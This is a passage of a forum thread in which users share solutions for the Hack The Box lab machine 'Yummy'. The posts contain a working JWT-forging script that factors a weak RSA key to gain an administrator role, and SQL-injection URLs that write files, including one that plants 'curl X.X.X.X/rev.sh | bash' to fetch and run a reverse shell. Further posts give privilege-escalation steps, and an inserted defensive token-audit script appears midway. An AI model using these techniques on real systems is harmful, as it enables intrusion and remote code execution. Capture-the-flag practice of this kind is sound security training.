HTB Yummy Linux
by Computerlab - Saturday October 5, 2024 at 04:27 PM
#31
Well this time may work but don't use port scanners directly.
You can easily be detected.
Use ip pool address to check for ports
Reply
#32
(Oct 05, 2024, 09:41 PM)Pepperwhite Wrote:
(Oct 05, 2024, 09:36 PM)sedlyf Wrote: put your token and you can access /admindashboard

import base64
import json
import jwt
from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import sympy

token = "<X-Auth-here"

js = json.loads(base64.b64decode(token.split(".")[1]).decode())
n= int(js["jwk"]['n'])
p,q= list((sympy.factorint(n)).keys())
e=65537
phi_n = (p-1)*(q-1)
d = pow(e, -1, phi_n)
key_data = {'n': n, 'e': e, 'd': d, 'p': p, 'q': q}
key = RSA.construct((key_data['n'], key_data['e'], key_data['d'], key_data['p'], key_data['q']))
private_key_bytes = key.export_key()

private_key = serialization.load_pem_private_key(
    private_key_bytes,
    password=None,
    backend=default_backend()
)
public_key = private_key.public_key()

data = jwt.decode(token,  public_key, algorithms=["RS256"] )
data["role"] = "administrator"

new_token = jwt.encode(data, private_key, algorithm="RS256")
print(new_token)

Doesn't look like it's working for me, getting logged out. But thanks anyways, I'll keep going on this track.

Try placing the generated JWT in X-AUTH-Token and session
Reply
#33
(Oct 05, 2024, 09:36 PM)sedlyf Wrote: put your token and you can access /admindashboard
import base64
import json
import jwt
from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import sympy

token = "X-Token"

def add_padding(b64_str):
    while len(b64_str) % 4 != 0:
        b64_str += '='
    return b64_str

def base64url_decode(input):
    input = add_padding(input)
    input = input.replace('-', '+').replace('_', '/')
    return base64.b64decode(input)

# Decode the payload
js = json.loads(base64url_decode(token.split(".")[1]).decode())
n = int(js["jwk"]['n'])
p, q = list((sympy.factorint(n)).keys())
e = 65537
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)
key_data = {'n': n, 'e': e, 'd': d, 'p': p, 'q': q}
key = RSA.construct((key_data['n'], key_data['e'], key_data['d'], key_data['p'], key_data['q']))
private_key_bytes = key.export_key()

private_key = serialization.load_pem_private_key(
    private_key_bytes,
    password=None,
    backend=default_backend()
)
public_key = private_key.public_key()

data = jwt.decode(token, public_key, algorithms=["RS256"])
data["role"] = "administrator"

new_token = jwt.encode(data, private_key, algorithm="RS256")
print(new_token)

The script doesn't work for me. I'm getting incorrect padding errors when I'm trying the X-Auth token in it.
Reply
#34
(Oct 05, 2024, 10:12 PM)Myst Wrote:
(Oct 05, 2024, 09:36 PM)sedlyf Wrote: put your token and you can access /admindashboard
import base64
import json
import jwt
from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import sympy

token = "X-Token"

def add_padding(b64_str):
    while len(b64_str) % 4 != 0:
        b64_str += '='
    return b64_str

def base64url_decode(input):
    input = add_padding(input)
    input = input.replace('-', '+').replace('_', '/')
    return base64.b64decode(input)

# Decode the payload
js = json.loads(base64url_decode(token.split(".")[1]).decode())
n = int(js["jwk"]['n'])
p, q = list((sympy.factorint(n)).keys())
e = 65537
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)
key_data = {'n': n, 'e': e, 'd': d, 'p': p, 'q': q}
key = RSA.construct((key_data['n'], key_data['e'], key_data['d'], key_data['p'], key_data['q']))
private_key_bytes = key.export_key()

private_key = serialization.load_pem_private_key(
    private_key_bytes,
    password=None,
    backend=default_backend()
)
public_key = private_key.public_key()

data = jwt.decode(token, public_key, algorithms=["RS256"])
data["role"] = "administrator"

new_token = jwt.encode(data, private_key, algorithm="RS256")
print(new_token)

The script doesn't work for me. I'm getting incorrect padding errors when I'm trying the X-Auth token in it.

The JWT you're putting in token probably has "session=" inside too. Remove it with the token following it.
Reply
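A defensive counterpart to the scripts quoted above, added here and not part of any post in this thread: a stdlib-only audit that restores the base64url padding the #33/#34 replies tripped over, refuses any token that carries its own public key (the verifier must use a pinned server key), and flags an RSA modulus small enough to factor. SAMPLE_TOKEN, its 20-bit modulus and the placeholder signature are constructed for the example.

```python
import base64
import json

MIN_RSA_MODULUS_BITS = 2048   # anything smaller is flagged; the thread's key was factorable
ALLOWED_ALGS = {"RS256"}      # explicit allow-list; never take the algorithm from the token alone

def b64url_decode(segment: str) -> bytes:
    """JWT segments are unpadded base64url; restore '=' padding before decoding."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)

def modulus_bits(n) -> int:
    """JWK 'n' is normally base64url big-endian bytes; this app stores it as an integer string."""
    if isinstance(n, int) or (isinstance(n, str) and n.isdigit()):
        return int(n).bit_length()
    return int.from_bytes(b64url_decode(n), "big").bit_length()

def audit_token(token: str) -> dict:
    """Return policy findings for a JWT without trusting anything it says about its own key."""
    head_b64, body_b64, _sig = token.split(".")
    header = json.loads(b64url_decode(head_b64))
    payload = json.loads(b64url_decode(body_b64))
    findings = {"alg": header.get("alg"), "problems": []}
    if findings["alg"] not in ALLOWED_ALGS:
        findings["problems"].append(f"algorithm {findings['alg']!r} is not in the allow-list")
    # Key material inside the token (header or payload) lets the sender choose the verifying key.
    jwk = header.get("jwk") or payload.get("jwk")
    if jwk is not None:
        findings["problems"].append("token carries its own public key (jwk); use a pinned key")
        if "n" in jwk:                      # RSA key: check the modulus size as well
            bits = modulus_bits(jwk["n"])
            findings["modulus_bits"] = bits
            if bits < MIN_RSA_MODULUS_BITS:
                findings["problems"].append(f"RSA modulus is only {bits} bits; trivially factorable")
    findings["accept"] = not findings["problems"]
    return findings

def b64url_encode_json(obj) -> str:
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()

# Constructed sample in the shape the thread describes: an integer 'n' inside the payload.
SAMPLE_TOKEN = ".".join([
    b64url_encode_json({"alg": "RS256", "typ": "JWT"}),
    b64url_encode_json({"role": "customer", "jwk": {"kty": "RSA", "n": str(1019 * 1021), "e": 65537}}),
    "c2lnbmF0dXJl",   # placeholder signature; audit_token never relies on it
])

if __name__ == "__main__":
    print(json.dumps(audit_token(SAMPLE_TOKEN), indent=2))
```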
#35
The db user does have the FILE permission node, so it may be possible to abuse that.

database management system users privileges:
[*]'chef'@'localhost' [1]:
    privilege: FILE
Reply
#36
(Oct 05, 2024, 10:51 PM)ShitWhiffler Wrote: The db user does have the FILE permission node, so it may be possible to abuse that.

database management system users privileges:
[*]'chef'@'localhost' [1]:
    privilege: FILE

might be able to write the users out to a txt file since we can't see them with sqlmap
EDIT: tried this, can't seem to write anything to /tmp
Reply
#37
Hello,

Here is a quick method to have a rev shell with mysql priv (admin X-AUTH-Token is required)

http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b

http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b

privesc to www-data
mv /data/scripts/app_backup.sh /data/scripts/app_backup.sh.old
mv "Your_Revshell.sh" /data/scripts/app_backup.sh

privesc to user
strings /var/www/app-qatesting/.hg/store/data/app.py.
Reply
#38
(Oct 06, 2024, 12:20 AM)jahman Wrote: Hello,

Here is a quick method to have a rev shell with mysql priv (admin X-AUTH-Token is required)

http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b

http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b

privesc to www-data
mv /data/scripts/app_backup.sh /data/scripts/app_backup.sh.old
mv "Your_Revshell.sh" /data/scripts/app_backup.sh

privesc to user
strings /var/www/app-qatesting/.hg/store/data/app.py.


I got the shell, how to go to www-data is confusing
Reply
#39
(Oct 06, 2024, 12:20 AM)jahman Wrote: Hello,

Here is a quick method to have a rev shell with mysql priv (admin X-AUTH-Token is required)

http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b

http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b

privesc to www-data
mv /data/scripts/app_backup.sh /data/scripts/app_backup.sh.old
mv "Your_Revshell.sh" /data/scripts/app_backup.sh

privesc to user
strings /var/www/app-qatesting/.hg/store/data/app.py.

(Oct 06, 2024, 01:36 AM)dogedofedoge Wrote:
(Oct 06, 2024, 12:20 AM)jahman Wrote: Hello,

Here is a quick method to have a rev shell with mysql priv (admin X-AUTH-Token is required)

http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b

http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b

privesc to www-data
mv /data/scripts/app_backup.sh /data/scripts/app_backup.sh.old
mv "Your_Revshell.sh" /data/scripts/app_backup.sh

privesc to user
strings /var/www/app-qatesting/.hg/store/data/app.py.


I got the shell, how to go to www-data is confusing

cd to /data/scripts
upload another shell

Do the mv commands to rename the file that's there to .old and then rename your shell to the name of the file you moved to .old
wait for the new shell to pick up....
Reply
#40
(Oct 06, 2024, 12:20 AM)jahman Wrote: Hello,

Here is a quick method to have a rev shell with mysql priv (admin X-AUTH-Token is required)

http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"ping%3b"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b

http://yummy.htb/admindashboard?s=aa&o=ASC%3b++select+"curl+X.X.X.X/rev.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b

privesc to www-data
mv /data/scripts/app_backup.sh /data/scripts/app_backup.sh.old
mv "Your_Revshell.sh" /data/scripts/app_backup.sh

privesc to user
strings /var/www/app-qatesting/.hg/store/data/app.py.

Did you get root yet?
user qa can run sudo -l:

User qa may run the following commands on localhost:
    (dev : dev) /usr/bin/hg pull /home/dev/app-production/

but I don't know how to work with this
Reply